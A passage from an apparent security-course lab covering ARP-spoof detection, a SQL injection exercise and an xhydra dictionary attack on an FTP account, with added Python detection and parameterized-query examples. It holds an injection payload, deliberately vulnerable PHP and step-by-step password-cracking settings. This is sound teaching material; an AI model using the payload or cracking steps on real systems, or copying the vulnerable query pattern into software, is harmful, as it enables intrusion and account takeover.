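IP address to the attacker's MAC.  A host that records every ARP reply on the
segment (as arpwatch does) can catch two symptoms:
  1. the MAC address claimed for an IP changes, and
  2. one MAC address claims more than one IP address.
All addresses below are constructed for a hypothetical lab network."""
from collections import defaultdict

# Constructed sample: (sender IP, sender MAC) pairs from ARP replies seen on the wire.
SAMPLE_ARP_REPLIES = [
    ("192.0.2.10", "00:11:22:33:44:01"),  # Windows VM, legitimate reply
    ("192.0.2.20", "00:11:22:33:44:02"),  # Linux VM, legitimate reply
    ("192.0.2.10", "00:11:22:33:44:01"),  # normal refresh, nothing changes
    ("192.0.2.20", "00:11:22:33:44:AA"),  # attacker's MAC now claims the Linux IP
    ("192.0.2.10", "00:11:22:33:44:AA"),  # ...and the Windows IP as well
]


def detect_arp_spoof(replies):
    """Return alerts as tuples:
       ("mac-change", ip, old_mac, new_mac)   symptom 1
       ("multi-ip", mac, sorted_ip_list)      symptom 2 (raised once per extra IP)"""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()               # normalise so "AA" and "aa" compare equal
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append(("mac-change", ip, previous, mac))
        ip_to_mac[ip] = mac
        if mac_to_ips[mac] and ip not in mac_to_ips[mac]:
            alerts.append(("multi-ip", mac, sorted(mac_to_ips[mac] | {ip})))
        mac_to_ips[mac].add(ip)
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_ARP_REPLIES):
        print(alert)
```

A NIC swap or a DHCP reassignment also produces symptom 1, so symptom 2 (one MAC suddenly answering for both victims) is the stronger signal of an active spoof.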
Task #3: Database Injection Attack
SQL injection attacks basically take the form of introducing or "injecting" malicious code via the input (form) for the SQL/MySQL database, in order to gain access to the backend database. There are many different methods of injection attacks. We will demonstrate a fairly common method of injection attack which exploits a weakness in web applications in front of a MySQL server that fail to sanitize user input; in this case, the user inserts illegal characters (a single quote ') within an established web-based database form.
In this section, we will only expose the student to the concept of an injection attack. You are NOT required to setup the MYSQL server, or run a SQL injection attack on your vulnerable machines...
INSTRUCTIONS:
- Study the following PHP code below:
    <?php
    $user = $_POST['usr'];            // value typed into the form, used without any checks
    $user = "anything' OR x='x";      // what an attacker types into the usr field
    mysql_query("SELECT user,password FROM users WHERE user='$user'");
    // The query the database actually receives (the quote closes the string early):
    // SELECT user,password FROM users WHERE user='anything' OR x='x'
    ?>
- How could this code be incorporated with an HTML document (using a form) to perform a database injection attack? Record your answer in your lab log-book.
- View the associated YouTube video in the resources above, and try to briefly explain why this type of attack could work. Write your explanation in your lab log-book.
- Now, make the following editing changes to your saved database form (the area to be changed is the mysql_real_escape_string() call wrapped around $_POST['usr']):
    <?php
    $user = mysql_real_escape_string($_POST['usr']);   // CHANGED: escape quotes in the form value
    // If the attacker again submits:  anything' OR x='x
    // $user now holds:                anything\' OR x=\'x
    mysql_query("SELECT user,password FROM users WHERE user='$user'");
    // The query the database receives (the quote no longer closes the string):
    // SELECT user,password FROM users WHERE user='anything\' OR x=\'x'
    ?>
- Try to explain how this last editing session prevented this SQL injection attack. Record your observations/answers in your lab log-book.
- Proceed to Task #4.
Answer Task #3 observations / questions in your lab log book.
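To see the two PHP snippets above actually behave differently, here is an added example (not part of the lab) that runs the same injection against an in-memory SQLite database and compares the unsanitized query with the escaped one and with a bound parameter. The table, its rows and the slightly altered payload are constructed for this example.

```python
"""Added example (not part of the lab): the Task #3 injection run against an
in-memory SQLite database, beside the two fixes (escaping, as the lab's
mysql_real_escape_string() does, and a bound parameter).  Table, rows and the
variant payload are constructed for this example."""
import sqlite3

# The lab's payload is  anything' OR x='x ; the form below compares two string
# literals instead, so it works without a column named x.
PAYLOAD = "anything' OR 'x'='x"


def make_db():
    """Constructed users table standing in for the lab's MySQL table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "pw-alice"), ("bob", "pw-bob")])
    return con


def lookup_vulnerable(con, user):
    """Mirrors the first PHP snippet: the form value is spliced into the SQL text."""
    sql = f"SELECT user,password FROM users WHERE user='{user}'"
    return con.execute(sql).fetchall()


def lookup_escaped(con, user):
    """Mirrors the second PHP snippet.  mysql_real_escape_string() backslash-escapes
    quotes for MySQL; SQLite uses SQL-standard quote doubling instead."""
    escaped = user.replace("'", "''")
    sql = f"SELECT user,password FROM users WHERE user='{escaped}'"
    return con.execute(sql).fetchall()


def lookup_safe(con, user):
    """Bound parameter: the value is never parsed as SQL, so a quote inside it
    cannot terminate the string literal.  Preferred over escaping."""
    return con.execute("SELECT user,password FROM users WHERE user=?", (user,)).fetchall()


def demo():
    con = make_db()
    return {
        "alice_vulnerable": lookup_vulnerable(con, "alice"),
        "payload_vulnerable": lookup_vulnerable(con, PAYLOAD),  # dumps every row
        "payload_escaped": lookup_escaped(con, PAYLOAD),        # no such user
        "payload_safe": lookup_safe(con, PAYLOAD),              # no such user
    }
```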
Task #4: Password Cracking Attack
In this section, you will learn another technique to crack passwords by obtaining usernames from e-mail addresses, and then running a password cracking program to hopefully gain access to an account on a vulnerable Windows server that contains a weak password. Then, after gaining access to the account, we will use a series of techniques to gain access to the administrator's account.
INSTRUCTIONS:
- Go to your vulnerable Windows server, create a username called weak that contains a very weak password (no special characters, just words that could be contained in a dictionary).
- How could you obtain usernames (eg. e-mail usernames) for a targeted computer system? (review your labs and notes during the Reconnaissance Phase). Record your answer in your lab log-book.
- Assuming that you have obtained a username (i.e. username: weak) from the reconnaissance phase, we will now be using a tool to gain access to the account on the targeted Windows server.
- We need to download a dictionary file containing many of the weak password combinations to help crack a user's weak password. You can perform a Netsearch in order to save this dictionary as a text file.
Here is a link to various password cracking dictionaries: http://www.skullsecurity.org/wiki/index.php/Passwords
As root, download the compressed file (cain.txt.bz2) to your /root directory.
- Decompress the file by issuing the following Linux command: bunzip2 cain.txt.bz2
- To launch the xhydra application as root (unless you are already in root), issue the following Linux command: sudo xhydra
- In the initial application window (ie. Target tab), enter the WINDOWS_IP_ADDR in the Target textbox.
- Under the Protocol list-box, select ftp.
- In the Output Options section, check Be verbose, and check Show Attempts.
- Move to the next screen by clicking on the Passwords tab.
- In the Username section, type the username called weak.
- In the Password section, click on the passwords list radio button, and then click on the passwords list text-box in order to browse to the /root/cain.txt dictionary (on your Kali Linux system) that contains common passwords that you downloaded and decompressed.
- At the bottom of the screen, check Try login as password, and click Try Empty Password.
- Click on the Start tab, and click on the Start button (at the bottom of the screen) to begin the attack.
- This attack may take several minutes to complete.
- Check the output from the Password Cracking Attempt. Did it list any usernames and passwords? If so, record the information in your lab log-book.
- What sort of harm can be done to this organization if the root account has been hacked?
- What sort of password rules should be used to make it harder to penetrate this system?
- Record your findings in your lab log-book.
- Proceed to the "Completing the Lab".
Answer Task #4 observations / questions in your lab log book.
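A dictionary run like the xhydra FTP attack above is noisy on the server side: many failed logins for one account from one client in a short time. The following is an added example (not part of the lab) of detection logic run over constructed FTP login records; the log format is invented for the example and is not any particular FTP server's format.

```python
"""Added example (not part of the lab): detection logic for the login-guessing
burst that a dictionary run such as the xhydra FTP attack in Task #4 produces.
The log lines and their one-line-per-attempt format are constructed for this
example and do not follow any particular FTP server's log format:
    <epoch seconds> <client ip> <username> <LOGIN_OK|LOGIN_FAIL>"""
from collections import defaultdict, deque

# Constructed log: a burst of failures from one client, then a success with the
# same account, plus one unrelated mistyped password from another client.
SAMPLE_LOG = """\
1700000000 192.0.2.40 weak LOGIN_FAIL
1700000001 192.0.2.40 weak LOGIN_FAIL
1700000002 192.0.2.40 weak LOGIN_FAIL
1700000003 192.0.2.50 alice LOGIN_FAIL
1700000003 192.0.2.40 weak LOGIN_FAIL
1700000004 192.0.2.40 weak LOGIN_FAIL
1700000005 192.0.2.40 weak LOGIN_FAIL
1700000006 192.0.2.40 weak LOGIN_OK
"""


def parse_line(line):
    ts, ip, user, result = line.split()
    return int(ts), ip, user, result


def detect_bruteforce(log_text, threshold=5, window=60):
    """Return alerts as tuples:
       ("burst", ip, failures_in_window)    threshold failures within window seconds
       ("success-after-burst", ip, user)    a login then succeeded from a flagged client"""
    recent = defaultdict(deque)   # client ip -> timestamps of recent failures
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, result = parse_line(line)
        if result == "LOGIN_FAIL":
            failures = recent[ip]
            failures.append(ts)
            while failures and ts - failures[0] > window:   # drop entries outside the window
                failures.popleft()
            if len(failures) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("burst", ip, len(failures)))
        elif result == "LOGIN_OK" and ip in flagged:
            alerts.append(("success-after-burst", ip, user))
    return alerts
```

The second alert type is the one worth paging on: a success right after a burst means the dictionary contained the account's password.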
Completing the Lab
Arrange evidence for each of these items on your screen, then ask your instructor to review them and sign off on the lab's completion:
- Proof of Windows VM hack from Phishing / Malicious Code.
- Packet Sniffing information from Linux to Windows FTP connection.
- Demonstration of prevention from Data Injection Attack.
- Completed Lab 4 notes.
Preparing for Quizzes
- Briefly explain the purpose of a Phishing Attack. How can phishing relate to using malicious code?
- Define the term Man in the Middle attack.
- Briefly list the steps in a Database Injection attack.
- How can a dictionary file be used to crack passwords on a targeted server?
- What is a password hash? How can a password hash be cracked?
- What can an organization do to prevent passwords on their computer system from being cracked?